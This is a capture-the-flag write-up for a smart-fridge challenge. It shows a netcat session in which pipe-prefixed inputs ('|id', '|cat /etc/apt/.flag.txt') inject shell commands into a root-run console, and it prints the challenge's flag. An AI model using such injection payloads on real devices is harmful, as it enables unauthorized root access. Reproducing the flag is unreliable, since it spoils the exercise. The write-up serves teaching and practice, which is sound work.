Fridge (Smart Home, 200p)

Your mom brings in the package, where you find a large amount of soda.
In the package there is also a letter.
The letter reads, that the smart fridge had sent out the order to restock itself.
You are certain that you have not ordered the products and neither has your family.
Access your smart fridge management console to investigate what is happening
Connect to: envXXX.target03
Port: 2333
The answer can be found in the /etc/apt/ folder

solution

Connecting to target shows welcome message to "SmartFridge Digital!" and asks for password. 

# nc envXXX.target03 2333

*******************************************
*                                         *
* Welcome to SmartFridge Digital!         *
* Please provide password to continue     *
*                                         *
*                                         *
*******************************************
*                                         *
*                               ********  *
*                               * 1234 *  *
*                               ********  *
*                                         *
*       **                                *
*       **                                *
*       **                                *
*       **                                *
*                                         *
*                                         *
*                                         *
*                                         *
*                                         *
*                                         *
*                                         *
*******************************************
-> 1. Enable internal camera              *
-> 2. Order food from local store         *
-> 3. Power saving options                *
-> 4. Configuration settings              *
-> To disconnect enter command 'quit'     *
*******************************************

Trying various default passwords, returns the same answer. 

1234
Wrong input (not authorized): '1234'
test
Wrong input (not authorized): 'test'

Trying all special characters, returns interesting output on | (pipe) character. 

|
Fridge is self-aware! Error: 0x0 dumping stack trace: ' .  . '

Pipe character usually indicate command injection. Trying it, succeeds. Retrieve the flag. 

|id
Fridge is self-aware! Error: 0x0 dumping stack trace: ' . uid=0(root) gid=0(root) groups=0(root)
 . '
|ls -al /etc/apt
Fridge is self-aware! Error: 0x0 dumping stack trace: ' . total 36
drwxr-xr-x 1 root root 4096 Sep 12 11:43 .
drwxr-xr-x 1 root root 4096 Sep 12 11:43 ..
-rw-r--r-- 1 root root   30 Sep 12 11:43 .flag.txt
drwxr-xr-x 2 root root 4096 Dec 10  2020 apt.conf.d
drwxr-xr-x 2 root root 4096 May 12  2020 auth.conf.d
drwxr-xr-x 1 root root 4096 Dec 11  2020 preferences.d
-rw-r--r-- 1 root root  421 Dec 10  2020 sources.list
drwxr-xr-x 2 root root 4096 May 12  2020 sources.list.d
drwxr-xr-x 2 root root 4096 Dec 10  2020 trusted.gpg.d
 . '
|cat /etc/apt/.flag.txt
Fridge is self-aware! Error: 0x0 dumping stack trace: ' . Flag: ctf-tech{2deb997d-1f67}

Flag is ctf-tech{2deb997d-1f67}.

Buy Me A Coffee